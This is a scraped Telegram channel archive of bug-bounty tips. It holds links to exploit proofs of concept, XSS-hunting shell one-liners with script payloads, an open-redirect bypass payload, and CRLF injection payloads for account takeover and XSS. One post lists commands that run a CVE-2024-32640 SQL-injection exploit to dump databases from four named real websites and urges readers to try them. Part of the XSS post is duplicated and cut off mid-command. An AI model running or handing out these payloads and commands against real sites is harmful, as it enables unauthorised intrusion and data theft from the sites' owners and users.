Bug bounty Tips
Kanalga Telegram’da o‘tish
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish6 003
Obunachilar
+524 soatlar
+687 kunlar
+33630 kunlar
Postlar arxiv
6 003
BlackHat ASIA 2021:
A tfp0 bug for macOS <=10.15.x (PoC for CVE-2020-27904)
https://www.blackhat.com/asia-21/briefings/schedule/#the-price-of-compatibility-defeating-macos-kernel-using-extended-file-attributes-21799
]-> PoC:
https://github.com/pattern-f/xattr-oob-swap
6 003
Apple Silicon Hardware Secrets:
SPRR and Guarded Exception Levels (GXF)
https://blog.svenpeter.dev/posts/m1_sprr_gxf
6 003
#Blue_Team_Techniques
1. Analysis of HSTS Caches of Different Browsers
]-> Forensic HSTS Analyzer:
https://github.com/ernw/forensic-hsts-analyzer
2. Detecting memory management bugs with GCC 11. Part 1 - Understanding dynamic allocation
https://developers.redhat.com/blog/2021/04/30/detecting-memory-management-bugs-with-gcc-11-part-1-understanding-dynamic-allocation
6 003
#Threat_Research
1. TG8 Firewall - PreAuth RCE/Password Disclosure (PoC)
https://ssd-disclosure.com/ssd-advisory-tg8-firewall-preauth-rce-and-password-disclosure
2. Cisco RV34X Series - Privilege Escalation in vpnTimer. Root Cause Analysis (PoC for CVE-2021-1520)
https://www.iot-inspector.com/blog/advisory-cisco-rv34x-series-privilege-escalation-vpntimer
6 003
Automate XSS using Dalfox, WaybackURL, GF Patterns.
Make sure you have Go installed on your Machine
To Install Go on your Machine:
1) sudo apt install -y golang
2) export GOROOT=/usr/lib/go
3) export GOPATH=$HOME/go
4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
5) source .bashrc
How to Hunt Blind XSS using Dalfox?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use GF patterns to find Possible XSS Vulnerable Parameters.
Use Dalfox to find XSS.
Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
How to Hunt Reflected XSS?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
Steps :
waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
Find the parameters which are not filtering special characters - One Liner
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$h
Find the parameters which are not filtering special characters -
One Liner
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt
6 003
Automate XSS using Dalfox, WaybackURL, GF Patterns.
Make sure you have Go installed on your Machine
To Install Go on your Machine:
1) sudo apt install -y golang
2) export GOROOT=/usr/lib/go
3) export GOPATH=$HOME/go
4) export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
5) source .bashrc
How to Hunt Blind XSS using Dalfox?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use GF patterns to find Possible XSS Vulnerable Parameters.
Use Dalfox to find XSS.
Steps :
waybackurls testphp.vulnweb.com | gf xss | sed 's/=.*/=/' | sort -u | tee Possible_xss.txt && cat Possible_xss.txt | dalfox -b blindxss.xss.ht pipe > output.txt
How to Hunt Reflected XSS?
Use Waybackurls by Tomnomnom to Fetch URLS for Specific Target.
Use qsreplace for Accept URLs on stdin, replace all query string values with a user-supplied value, only output each combination of query string parameters once per host and path.
Steps :
waybackurls testphp.vulnweb.com| grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -s --path-as-is --insecure "$host" | grep -qs "<script>alert(1)</script>" && echo "$host \033[0;31m" Vulnerable;done
Find the parameters which are not filtering special characters - One Liner
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$h
Find the parameters which are not filtering special characters -
One Liner
echo "test.url" | waybackurls | grep "=" | tee waybackurls.txt
cat waybackruls | egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt
6 003
#bugbountytips:
always see if there a captcha in your Target.then try to know how the captcha it's work and try to bypass it you don't know maybe you got it😉
#Note:
Many programs don't accept this kind of vulnerability. So you must search just in authentication endpoint
6 003
when you are looking for bugs like SSRF & Open Redirect. and there is a blacklisted character.
try to bypassed using other Unicode characters.
I found Open Redirect Bypass Using (。) Chinese dot "%E3%80%82".
poc:
redirect_to=////evil%E3%80%82com
#BugBounty #bugbountytip6 003
CRLF Tip:
Starting payloads:
/end/vuln/%0a%0d
/end/vuln/%0a
...etc.
Now escalate the impact:
1- ATO
If the web app vulnerable to Session Fixition, simply set a new cookie using the CRLF and send it to the Victim, then try to login with the injected cookies
2- Open redirect
Just add "Location:" header
3- XSS
- Add the "Location:" header with the value: "javascript: confirm(1)"
- Add the "Content-Length:" header this will make the response body read it at the end of response headers, then add your XSS payload
6 003
test on these site and thank me later just give star to him :)
python3 CVE-2024-32640.py -u http://masa01.imve.com/ -g --dbs
python3 CVE-2024-32640.py -u https://www.kunstuitleenutrecht.nl -g --dbs
python3 CVE-2024-32640.py -u https://www.ryanwatts.me/ -g --dbs
python3 CVE-2024-32640.py -u http://www.pennydesigns.com/ -g --dbs
6 003
Automated SQLi Exploitation of Mura & Masa CMS via CVE-2024-32640
thank to my friend @StuartBeck11 for amazing work ! give him a star ⭐
https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS
